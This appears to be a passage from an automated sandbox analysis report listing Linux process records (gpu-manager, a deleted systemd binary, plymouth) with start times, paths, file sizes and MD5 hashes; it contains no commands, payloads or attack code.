                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:42
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:43
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:/usr/bin/gpu-manager --log /var/log/gpu-manager.log
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    File Activities

                                                    Process Activities

                                                    System Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/bin/gpu-manager
                                                    Arguments:-
                                                    File size:76616 bytes
                                                    MD5 hash:8fae9dd5dd67e1f33d873089c2fd8761

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:44
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:49:45
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    Process Activities


                                                    General

                                                    Start time (UTC):18:49:45
                                                    Start date (UTC):02/04/2025
                                                    Path:/bin/plymouth
                                                    Arguments:/bin/plymouth quit
                                                    File size:51352 bytes
                                                    MD5 hash:87003efd8dad470042f5e75360a8f49f

                                                    File Activities

                                                    Network Activities


                                                    General

                                                    Start time (UTC):18:50:33
                                                    Start date (UTC):02/04/2025
                                                    Path:/usr/lib/systemd/systemd (deleted)
                                                    Arguments:-
                                                    File size:1620224 bytes
                                                    MD5 hash:9b2bec7092a40488108543f9334aab75

                                                    File Activities

                                                    Process Activities

                                                    Network Activities